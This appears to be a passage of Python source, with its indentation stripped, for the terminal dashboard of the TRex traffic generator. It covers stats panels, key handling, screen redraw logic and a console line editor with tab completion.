self.client._show_global_stats(buffer = buffer)
buf = StringIO()
have_into = False
try:
self.client._show_traffic_stats(False, buffer = buf, tgid = self.tgid, is_sum = self.is_sum, is_dynamic = self.is_dynamic)
have_into = True
except ASTFErrorBadTG:
self.tgid = 0
if have_into:
buf.seek(0)
out_lines = buf.readlines()
self.num_lines = len(out_lines)
buffer.write(''.join(out_lines[self.start_row:self.start_row+self.max_lines]))
buffer.write('\n')
def get_key_actions(self):
return self.key_actions
def action_clear(self):
self.client.clear_stats()
if (self.is_dynamic):
self.client.clear_dynamic_traffic_stats()
return ""
def action_up(self):
if self.start_row > self.num_lines:
self.start_row = self.num_lines
elif self.start_row > 0:
self.start_row -= 1
def action_down(self):
if self.start_row < self.num_lines - self.max_lines:
self.start_row += 1
def action_left(self):
if self.tgid > 0:
self.tgid -= 1
def action_right(self):
if self.tgid < self.client._get_num_of_tgids():
self.tgid += 1
def action_dynamic_counters(self):
self.is_dynamic = (not self.is_dynamic)
# ASTF latency stats
class TrexTUIAstfLatencyStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUIAstfLatencyStats, self).__init__(mng, 'lstats')
self.key_actions = OrderedDict()
self.key_actions['v'] = {'action': self.action_toggle_view, 'legend': self.get_next_view, 'show': True}
self.views = [
{'name': 'main latency', 'func': self.client._show_latency_stats},
{'name': 'histogram', 'func': self.client._show_latency_histogram},
{'name': 'counters', 'func': self.client._show_latency_counters},
]
self.view_index = 0
self.next_view_index = 1
def get_next_view(self):
return "view toggle to '%s'" % self.views[self.next_view_index]['name']
def show(self, buffer):
self.client._show_global_stats(buffer = buffer)
self.views[self.view_index]['func'](buffer = buffer)
def get_key_actions (self):
return self.key_actions
def action_toggle_view(self):
self.view_index = self.next_view_index
self.next_view_index = (1 + self.next_view_index) % len(self.views)
return ""
# utilization stats
class TrexTUIUtilizationStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUIUtilizationStats, self).__init__(mng, "ustats")
self.key_actions = {}
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
self.client._show_cpu_util(buffer = buffer)
self.client._show_mbuf_util(buffer = buffer)
def get_key_actions (self):
return self.key_actions
# log
class TrexTUILog():
def __init__ (self):
self.log = []
def add_event (self, msg):
self.log.append("[{0}] {1}".format(str(datetime.datetime.now().time()), msg))
def show (self, buffer, max_lines = 4):
cut = len(self.log) - max_lines
if cut < 0:
cut = 0
print(format_text("\nLog:", 'bold', 'underline'), file = buffer)
for msg in self.log[cut:]:
print(msg, file = buffer)
# a predicate to wrap function as a bool
class Predicate(object):
def __init__ (self, func):
self.func = func
def __nonzero__ (self):
return True if self.func() else False
def __bool__ (self):
return True if self.func() else False
# Panels manager (contains server panels)
class TrexTUIPanelManager():
def __init__ (self, tui):
self.tui = tui
self.client = tui.client
self.ports = self.client.get_all_ports()
self.locked = False
self.panels = {}
self.panels['dashboard'] = TrexTUIDashBoard(self)
self.panels['ustats'] = TrexTUIUtilizationStats(self)
self.key_actions = OrderedDict()
# we allow console only when ports are acquired
self.key_actions['ESC'] = {'action': self.action_none, 'legend': 'console', 'show': Predicate(lambda : not self.locked)}
self.key_actions['q'] = {'action': self.action_none, 'legend': 'quit', 'show': True}
self.key_actions['d'] = {'action': self.action_show_dash, 'legend': 'dashboard', 'show': True}
self.key_actions['u'] = {'action': self.action_show_ustats, 'legend': 'util', 'show': True}
# HACK - FIX THIS
# stateless specific panels
if self.client.get_mode() == "STL":
self.panels['sstats'] = TrexTUIStreamsStats(self)
self.panels['lstats'] = TrexTUILatencyStats(self)
self.key_actions['s'] = {'action': self.action_show_sstats, 'legend': 'streams', 'show': True}
self.key_actions['l'] = {'action': self.action_show_lstats, 'legend': 'latency', 'show': True}
elif self.client.get_mode() == "ASTF":
self.panels['astats'] = TrexTUIAstfTrafficStats(self)
self.panels['lstats'] = TrexTUIAstfLatencyStats(self)
self.key_actions['t'] = {'action': self.action_show_astats, 'legend': 'astf', 'show': True}
self.key_actions['l'] = {'action': self.action_show_lstats, 'legend': 'latency', 'show': True}
# start with dashboard
self.main_panel = self.panels['dashboard']
# log object
self.log = TrexTUILog()
self.generate_legend()
self.conn_bar = SimpleBar('status: ', ['|','/','-','\\'])
self.dis_bar = SimpleBar('status: ', ['X', ' '])
self.show_log = False
def generate_legend(self):
self.legend = "\n{:<12}".format("browse:")
for k, v in self.key_actions.items():
if v['show']:
try:
legend = v['legend']()
except TypeError:
legend = v['legend']
x = "'{0}' - {1}, ".format(k, legend)
if v.get('color'):
self.legend += "{:}".format(format_text(x, v.get('color')))
else:
self.legend += "{:}".format(x)
self.legend += "\n{:<12}".format(self.main_panel.get_name() + ":")
for k, v in self.main_panel.get_key_actions().items():
if v['show']:
try:
legend = v['legend']()
except TypeError:
legend = v['legend']
x = "'{0}' - {1}, ".format(k, legend)
if v.get('color'):
self.legend += "{:}".format(format_text(x, v.get('color')))
else:
self.legend += "{:}".format(x)
def print_connection_status (self, buffer):
if self.tui.get_state() == self.tui.STATE_ACTIVE:
self.conn_bar.show(buffer = buffer)
else:
self.dis_bar.show(buffer = buffer)
def print_legend (self, buffer):
print(format_text(self.legend, 'bold'), file = buffer)
# on window switch or turn on / off of the TUI we call this
def init (self, show_log = False, locked = False):
self.show_log = show_log
self.locked = locked
self.generate_legend()
def show (self, show_legend, buffer):
try:
self.main_panel.show(buffer)
except:
if self.client.is_connected():
raise
self.print_connection_status(buffer)
if show_legend:
self.generate_legend()
self.print_legend(buffer)
if self.show_log:
self.log.show(buffer)
def handle_key (self, ch):
# check for the manager registered actions
if ch in self.key_actions:
msg = self.key_actions[ch]['action']()
# check for main panel actions
elif ch in self.main_panel.get_key_actions():
msg = self.main_panel.get_key_actions()[ch]['action']()
else:
return False
self.generate_legend()
return True
#if msg == None:
# return False
#else:
# if msg:
# self.log.add_event(msg)
# return True
# actions
def action_none (self):
return None
def action_show_dash (self):
self.main_panel = self.panels['dashboard']
self.init(self.show_log)
return ""
def action_show_port (self, port_id):
def action_show_port_x ():
self.main_panel = self.panels['port {0}'.format(port_id)]
self.init()
return ""
return action_show_port_x
def action_show_sstats (self):
self.main_panel = self.panels['sstats']
self.init(self.show_log)
return ""
def action_show_astats (self):
self.main_panel = self.panels['astats']
self.init(self.show_log)
return ""
def action_show_lstats (self):
self.main_panel = self.panels['lstats']
self.init(self.show_log)
return ""
def action_show_ustats(self):
self.main_panel = self.panels['ustats']
self.init(self.show_log)
return ""
# ScreenBuffer is a class designed to
# avoid inline delays when reprinting the screen
class ScreenBuffer():
def __init__ (self, redraw_cb):
self.snapshot = ''
self.lock = threading.Lock()
self.redraw_cb = redraw_cb
self.update_flag = False
def start (self):
self.active = True
self.t = threading.Thread(target = self.__handler)
self.t.setDaemon(True)
self.t.start()
def stop (self):
self.active = False
self.t.join()
# request an update
def update (self):
self.update_flag = True
# fetch the screen, return None if no new screen exists yet
def get (self):
if not self.snapshot:
return None
# we have a snapshot - fetch it
with self.lock:
x = self.snapshot
self.snapshot = None
return x
def __handler (self):
while self.active:
if self.update_flag:
self.__redraw()
time.sleep(0.01)
# redraw the next screen
def __redraw (self):
buffer = StringIO()
self.redraw_cb(buffer)
with self.lock:
self.snapshot = buffer
self.update_flag = False
# a policer class to make sure no too-fast redraws
# occurs - it filters fast bursts of redraws
class RedrawPolicer():
def __init__ (self, rate):
self.ts = 0
self.marked = False
self.rate = rate
self.force = False
def mark_for_redraw (self, force = False):
self.marked = True
if force:
self.force = True
def should_redraw (self):
dt = time.time() - self.ts
return self.force or (self.marked and (dt > self.rate))
def reset (self, restart = False):
self.ts = time.time()
self.marked = restart
self.force = False
# shows a textual top style window
class TrexTUI():
STATE_ACTIVE = 0
STATE_LOST_CONT = 1
STATE_RECONNECT = 2
is_graph = False
_ref_cnt = 0
MIN_ROWS = 45
MIN_COLS = 111
class ScreenSizeException(Exception):
def __init__ (self, cols, rows):
msg = "TUI requires console screen size of at least {0}x{1}, current is {2}x{3}".format(TrexTUI.MIN_COLS,
TrexTUI.MIN_ROWS,
cols,
rows)
super(TrexTUI.ScreenSizeException, self).__init__(msg)
def __init__ (self, console):
self.console = console
self.client = console.client
self.tui_global_lock = threading.Lock()
self.pm = TrexTUIPanelManager(self)
self.sb = ScreenBuffer(self.redraw_handler)
TrexTUI._ref_cnt += 1
def __del__(self):
TrexTUI._ref_cnt -= 1
@classmethod
def has_instance(cls):
return cls._ref_cnt > 0
def redraw_handler (self, buffer):
# this is executed by the screen buffer - should be protected against TUI commands
with self.tui_global_lock:
self.pm.show(show_legend = self.async_keys.is_legend_mode(), buffer = buffer)
def clear_screen (self, lines = 50):
# reposition the cursor
sys.stdout.write("\x1b[0;0H")
# clear all lines
for i in range(lines):
sys.stdout.write("\x1b[0K")
if i < (lines - 1):
sys.stdout.write("\n")
# reposition the cursor
sys.stdout.write("\x1b[0;0H")
def show (self, client, save_console_history, show_log = False, locked = False):
rows, cols = os.popen('stty size', 'r').read().split()
if (int(rows) < TrexTUI.MIN_ROWS) or (int(cols) < TrexTUI.MIN_COLS):
raise self.ScreenSizeException(rows = rows, cols = cols)
with AsyncKeys(client, self.console, save_console_history, self.tui_global_lock, locked) as async_keys:
sys.stdout.write("\x1bc")
self.async_keys = async_keys
self.show_internal(show_log, locked)
def show_internal (self, show_log, locked):
self.pm.init(show_log, locked)
self.state = self.STATE_ACTIVE
self.time_ts = None
# create print policers
self.full_redraw = RedrawPolicer(0.5)
self.keys_redraw = RedrawPolicer(0.05)
self.full_redraw.mark_for_redraw()
try:
self.sb.start()
while True:
# draw and handle user input
status = self.async_keys.tick(self.pm)
# prepare the next frame
self.prepare(status)
time.sleep(0.01)
self.draw_screen()
with self.tui_global_lock:
self.handle_state_machine()
except TUIQuit:
print("\nExiting TUI...")
except KeyboardInterrupt:
print("\nExiting TUI...")
finally:
self.sb.stop()
print("")
# handle state machine
def handle_state_machine (self):
# regular state
if self.state == self.STATE_ACTIVE:
# if no connectivity - move to lost connecitivty
if not self.client.is_connected():
self.state = self.STATE_LOST_CONT
self.time_ts = time.time()
# lost connectivity
elif self.state == self.STATE_LOST_CONT:
# if the connection is alive (some data is arriving on the async channel)
# try to reconnect
if (time.time() - self.time_ts) > 5.0:
# move to state reconnect
self.state = self.STATE_RECONNECT
# restored connectivity - try to reconnect
elif self.state == self.STATE_RECONNECT:
try:
self.client.connect()
self.client.acquire()
self.state = self.STATE_ACTIVE
except TRexError:
self.state = self.STATE_LOST_CONT
self.time_ts = time.time()
# logic before printing
def prepare (self, status):
if status == AsyncKeys.STATUS_REDRAW_ALL:
self.full_redraw.mark_for_redraw(force = True)
elif status == AsyncKeys.STATUS_REDRAW_KEYS:
self.keys_redraw.mark_for_redraw()
if self.full_redraw.should_redraw():
self.sb.update()
self.full_redraw.reset(restart = True)
return
# draw once
def draw_screen (self):
# check for screen buffer's new screen
x = self.sb.get()
# we have a new screen to draw
if x:
self.clear_screen()
self.async_keys.draw(x)
sys.stdout.write(x.getvalue())
sys.stdout.flush()
# maybe we need to redraw the keys
elif self.keys_redraw.should_redraw():
sys.stdout.write("\x1b[4A")
self.async_keys.draw(sys.stdout)
sys.stdout.flush()
# reset the policer for next time
self.keys_redraw.reset()
def get_state (self):
return self.state
class TokenParser(object):
def __init__ (self, seq):
self.buffer = list(seq)
def pop (self):
return self.buffer.pop(0)
def peek (self):
if not self.buffer:
return None
return self.buffer[0]
def next_token (self):
if not self.peek():
return None
token = self.pop()
# special chars
if token == '\x1b':
while self.peek():
token += self.pop()
return token
def parse (self):
tokens = []
while True:
token = self.next_token()
if token == None:
break
tokens.append(token)
return tokens
# handles async IO
class AsyncKeys:
MODE_LEGEND = 1
MODE_CONSOLE = 2
STATUS_NONE = 0
STATUS_REDRAW_KEYS = 1
STATUS_REDRAW_ALL = 2
def __init__ (self, client, console, save_console_history, tui_global_lock, locked = False):
self.tui_global_lock = tui_global_lock
self.engine_console = AsyncKeysEngineConsole(self, console, client, save_console_history)
self.engine_legend = AsyncKeysEngineLegend(self)
self.locked = locked
if locked:
self.engine = self.engine_legend
self.locked = True
else:
self.engine = self.engine_console
self.locked = False
def __enter__ (self):
# init termios
self.old_settings = termios.tcgetattr(sys.stdin)
new_settings = termios.tcgetattr(sys.stdin)
new_settings[3] = new_settings[3] & ~(termios.ECHO | termios.ICANON) # lflags
new_settings[6][termios.VMIN] = 0 # cc
new_settings[6][termios.VTIME] = 0 # cc
# huge buffer - no print without flush
sys.stdout = open('/dev/stdout', 'w', TrexTUI.MIN_COLS * TrexTUI.MIN_COLS * 2)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, new_settings)
return self
def __exit__ (self, type, value, traceback):
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, self.old_settings)
# restore sys.stdout
sys.stdout.close()
sys.stdout = sys.__stdout__
def is_legend_mode (self):
return self.engine.get_type() == AsyncKeys.MODE_LEGEND
def is_console_mode (self):
return self.engine.get_type == AsyncKeys.MODE_CONSOLE
def switch (self):
if self.is_legend_mode():
self.engine = self.engine_console
else:
self.engine = self.engine_legend
def handle_token (self, token, pm):
# ESC for switch
if token == '\x1b':
if not self.locked:
self.switch()
return self.STATUS_REDRAW_ALL
# EOF (ctrl + D)
if token == '\x04':
raise TUIQuit()
# pass tick to engine
return self.engine.tick(token, pm)
def tick (self, pm):
rc = self.STATUS_NONE
# fetch the stdin buffer
seq = os.read(sys.stdin.fileno(), 1024).decode('ascii', errors = 'ignore')
if not seq:
return self.STATUS_NONE
# parse all the tokens from the buffer
tokens = TokenParser(seq).parse()
# process them
for token in tokens:
token_rc = self.handle_token(token, pm)
rc = max(rc, token_rc)
return rc
def draw (self, buffer):
self.engine.draw(buffer)
# Legend engine
class AsyncKeysEngineLegend:
def __init__ (self, async_):
self.async_ = async_
def get_type (self):
return self.async_.MODE_LEGEND
def tick (self, seq, pm):
if seq == 'q':
raise TUIQuit()
if len(seq) > 1:
if seq == '\x1b\x5b\x41': # scroll up
pm.handle_key('Up')
if seq == '\x1b\x5b\x42': # scroll down
pm.handle_key('Down')
if seq == '\x1b\x5b\x43': # scroll right
pm.handle_key('Right')
if seq == '\x1b\x5b\x44': # scroll left
pm.handle_key('Left')
return AsyncKeys.STATUS_NONE
rc = pm.handle_key(seq)
return AsyncKeys.STATUS_REDRAW_ALL if rc else AsyncKeys.STATUS_NONE
def draw (self, buffer):
pass
# console engine
class AsyncKeysEngineConsole:
def __init__ (self, async_, console, client, save_console_history):
self.async_ = async_
self.lines = deque(maxlen = 100)
self.generate_prompt = console.generate_prompt
self.save_console_history = save_console_history
self.ac = client.get_console_methods()
self.ac.update({'quit' : self.action_quit,
'q' : self.action_quit,
'exit' : self.action_quit,
'help' : self.action_help,
'?' : self.action_help})
# fetch readline history and add relevants
for i in range(1, readline.get_current_history_length()):
cmd = readline.get_history_item(i)
if cmd.strip() and cmd.split()[0] in self.ac:
self.lines.appendleft(CmdLine(cmd))
# new line
self.lines.appendleft(CmdLine(''))
self.line_index = 0
self.last_status = ''
def action_quit (self, _):
raise TUIQuit()
def action_help (self, _):
return ' '.join([format_text(cmd, 'bold') for cmd in self.ac.keys()])
def get_type (self):
return self.async_.MODE_CONSOLE
def handle_escape_char (self, seq):
# up
if seq == '\x1b[A':
self.line_index = min(self.line_index + 1, len(self.lines) - 1)
# down
elif seq == '\x1b[B':
self.line_index = max(self.line_index - 1, 0)
# left
elif seq == '\x1b[D':
self.lines[self.line_index].go_left()
# right
elif seq == '\x1b[C':
self.lines[self.line_index].go_right()
# del
elif seq == '\x1b[3~':
self.lines[self.line_index].del_key()
# home
elif seq in ('\x1b[H', '\x1b\x4fH'):
self.lines[self.line_index].home_key()
# end
elif seq in ('\x1b[F', '\x1b\x4fF'):
self.lines[self.line_index].end_key()
# Alt + Backspace
elif seq == '\x1b\x7f':
pos = orig_pos = self.lines[self.line_index].cursor_index
cut_to_pos = None
line = self.lines[self.line_index].get()
while pos >= 1:
if pos == 1:
cut_to_pos = 0
elif line[pos - 1] != ' ' and line[pos - 2] == ' ':
cut_to_pos = pos - 1
break
pos -= 1
if cut_to_pos is not None:
self.lines[self.line_index].set(line[:cut_to_pos] + line[orig_pos:], cut_to_pos)
# Alt + Left or Ctrl + Left
elif seq in ('\x1b[\x31\x3B\x33\x44', '\x1b[\x31\x3B\x35\x44'):
pos = self.lines[self.line_index].cursor_index
move_to_pos = None
line = self.lines[self.line_index].get()
while pos >= 1:
if pos == 1:
move_to_pos = 0
elif line[pos - 1] != ' ' and line[pos - 2] == ' ':
move_to_pos = pos - 1
break
pos -= 1
if move_to_pos is not None:
self.lines[self.line_index].cursor_index = move_to_pos
# Alt + Right or Ctrl + Right
elif seq in ('\x1b[\x31\x3B\x33\x43', '\x1b[\x31\x3B\x35\x43'):
pos = self.lines[self.line_index].cursor_index
move_to_pos = None
line = self.lines[self.line_index].get()
while pos <= len(line) - 1:
if pos == len(line) - 1:
move_to_pos = len(line)
elif line[pos] != ' ' and line[pos + 1] == ' ':
move_to_pos = pos + 1
break
pos += 1
if move_to_pos is not None:
self.lines[self.line_index].cursor_index = move_to_pos
# PageUp
elif seq == '\x1b\x5b\x35\x7e':
line_part = self.lines[self.line_index].get()[:self.lines[self.line_index].cursor_index]
index = self.line_index
while index < len(self.lines) - 1:
index += 1
if self.lines[index].get().startswith(line_part):
self.lines[index].cursor_index = self.lines[self.line_index].cursor_index
self.line_index = index
break
# PageDown
elif seq == '\x1b\x5b\x36\x7e':
line_part = self.lines[self.line_index].get()[:self.lines[self.line_index].cursor_index]
index = self.line_index
while index > 0:
index -= 1
if self.lines[index].get().startswith(line_part):
self.lines[index].cursor_index = self.lines[self.line_index].cursor_index
self.line_index = index
break
# unknown key
else:
return AsyncKeys.STATUS_NONE
return AsyncKeys.STATUS_REDRAW_KEYS
def tick (self, seq, _):
# handle escape chars
if len(seq) > 1:
return self.handle_escape_char(seq)
# handle each char
for ch in seq:
return self.handle_single_key(ch)
def handle_single_key (self, ch):
# newline
if ch == '\n':
self.handle_cmd()
# backspace
elif ch == '\x7f':
self.lines[self.line_index].backspace()
# TAB
elif ch == '\t':
tokens = self.lines[self.line_index].get().split()
if not tokens:
return
if len(tokens) == 1:
self.handle_tab_names(tokens[0])
else:
self.handle_tab_files(tokens)
# simple char
else:
self.lines[self.line_index] += ch
return AsyncKeys.STATUS_REDRAW_KEYS
# handle TAB key for completing function names
def handle_tab_names (self, cur):
matching_cmds = [x for x in self.ac if x.startswith(cur)]
common = os.path.commonprefix([x for x in self.ac if x.startswith(cur)])
if common:
if len(matching_cmds) == 1:
self.lines[self.line_index].set(common + ' ')
self.last_status = ''
else:
self.lines[self.line_index].set(common)
self.last_status = 'ambigious: '+ ' '.join([format_text(cmd, 'bold') for cmd in matching_cmds])
# handle TAB for completing filenames
def handle_tab_files (self, tokens):
# only commands with files
if tokens[0] not in {'start', 'push'}:
return
# '-f' with no parameters - no partial and use current dir
if tokens[-1] == '-f':
partial = ''
d = '.'
# got a partial path
elif tokens[-2] == '-f':
partial = tokens.pop()
# check for dirs
dirname, basename = os.path.dirname(partial), os.path.basename(partial)
if os.path.isdir(dirname):
d = dirname
partial = basename
else:
d = '.'
else:
return
# fetch all dirs and files matching wildcard
files = []
for x in os.listdir(d):
if os.path.isdir(os.path.join(d, x)):
files.append(x + '/')
elif x.endswith( ('.py', 'yaml', 'pcap', 'cap', 'erf') ):
files.append(x)
# dir might not have the files
if not files:
self.last_status = format_text('no loadble files under path', 'bold')
return
# find all the matching files
matching_files = [x for x in files if x.startswith(partial)] if partial else files
# do we have a longer common than partial ?
common = os.path.commonprefix([x for x in files if x.startswith(partial)])
if not common:
common = partial
tokens.append(os.path.join(d, common) if d != '.' else common)
# reforge the line
newline = ' '.join(tokens)
if len(matching_files) == 1:
if os.path.isfile(tokens[-1]):
newline += ' '
self.lines[self.line_index].set(newline)
self.last_status = ''
else:
self.lines[self.line_index].set(newline)
self.last_status = ' '.join([format_text(f, 'bold') for f in matching_files[:5]])
if len(matching_files) > 5:
self.last_status += ' ... [{0} more matches]'.format(len(matching_files) - 5)
def split_cmd (self, cmd):
s = cmd.split(' ', 1)
op = s[0]
param = s[1] if len(s) == 2 else ''
return op, param
def handle_cmd (self):
cmd = self.lines[self.line_index].get().strip()
if not cmd:
return
op, param = self.split_cmd(cmd)
func = self.ac.get(op)
if func:
with self.async_.tui_global_lock:
func_rc = func(param)
# take out the empty line
empty_line = self.lines.popleft()
assert(empty_line.ro_line == '')
if not self.lines or self.lines[0].ro_line != cmd:
self.lines.appendleft(CmdLine(cmd))
# back in
self.lines.appendleft(empty_line)
self.line_index = 0
readline.add_history(cmd)
self.save_console_history()
# back to readonly
for line in self.lines:
line.invalidate()
assert(self.lines[0].modified == False)
color = None
if not func:
self.last_status = "unknown command: '{0}'".format(format_text(cmd.split()[0], 'bold'))
else:
# internal commands
if isinstance(func_rc, str):
self.last_status = func_rc
# RC response
else:
# success
if func_rc is None:
self.last_status = format_text("[OK]", 'green')
# errors
else:
err_msgs = ascii_split(str(func_rc))
if not err_msgs:
err_msgs = ['Unknown error']
self.last_status = format_text(clear_formatting(err_msgs[0]), 'red')
if len(err_msgs) > 1:
self.last_status += " [{0} more errors messages]".format(len(err_msgs) - 1)
color = 'red'
# trim too long lines
if ansi_len(self.last_status) > TrexTUI.MIN_COLS:
self.last_status = format_text(self.last_status[:TrexTUI.MIN_COLS] + "...", color, 'bold')
def draw (self, buffer):
buffer.write("\nPress 'ESC' for navigation panel...\n")
buffer.write("status: \x1b[0K{0}\n".format(self.last_status))
buffer.write("\n{0}\x1b[0K".format(self.generate_prompt(prefix = 'tui')))
self.lines[self.line_index].draw(buffer)
# a readline alike command line - can be modified during edit
class CmdLine(object):
def __init__ (self, line):
self.ro_line = line
self.w_line = None
self.modified = False
self.cursor_index = len(line)
def get (self):
if self.modified:
return self.w_line
else:
return self.ro_line
def set (self, line, cursor_pos = None):
self.w_line = line
self.modified = True
if cursor_pos is None:
self.cursor_index = len(self.w_line)
else:
self.cursor_index = cursor_pos
def __add__ (self, other):
assert(0)
def __str__ (self):
return self.get()
def __iadd__ (self, other):
self.set(self.get()[:self.cursor_index] + other + self.get()[self.cursor_index:],
cursor_pos = self.cursor_index + len(other))
return self
def backspace (self):
if self.cursor_index == 0:
return
self.set(self.get()[:self.cursor_index - 1] + self.get()[self.cursor_index:],
self.cursor_index - 1)
def del_key (self):
if self.cursor_index == len(self.get()):
return
self.set(self.get()[:self.cursor_index] + self.get()[self.cursor_index + 1:],
self.cursor_index)
def home_key (self):
self.cursor_index = 0
def end_key (self):
self.cursor_index = len(self.get())
def invalidate (self):
self.modified = False
self.w_line = None
self.cursor_index = len(self.ro_line)
def go_left (self):
self.cursor_index = max(0, self.cursor_index - 1)
def go_right (self):
self.cursor_index = min(len(self.get()), self.cursor_index + 1)
def draw (self, buffer):
buffer.write(self.get())
buffer.write('\b' * (len(self.get()) - self.cursor_index))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.